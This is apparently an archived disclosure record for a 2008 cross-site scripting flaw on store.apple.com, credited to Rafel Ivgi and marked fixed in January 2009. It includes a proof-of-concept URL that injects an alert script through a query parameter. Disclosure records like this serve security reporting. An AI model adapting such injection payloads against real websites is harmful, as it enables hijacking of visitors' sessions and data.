Security researcher Rafel Ivgi, has submitted on 27/12/2008 a cross-site-scripting (XSS) vulnerability affecting store.apple.com, which at the time of submission ranked 70 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 29/12/2008. It is currently fixed. |
| Date submitted: 27/12/2008 |
Date published: 29/12/2008 |
Date fixed: 26/01/2009 | Status:  FIXED |
| Author: Rafel Ivgi |
Domain: store.apple.com |
Category: XSS |
Pagerank: 70 |
|---|
URL: http://store.apple.com/us/product/TU243LL/A?fnode=MTY1NDA4Mg&mco=MjQyMDQ1OA&s=newest'"><script>alert
("The%20apple%20didn't%20fell%20far%20from%20the%20last%20apple")</script>%3E%3Cdiv%20id=%22 |
|
Click here to view the mirror
|
|
|
| 
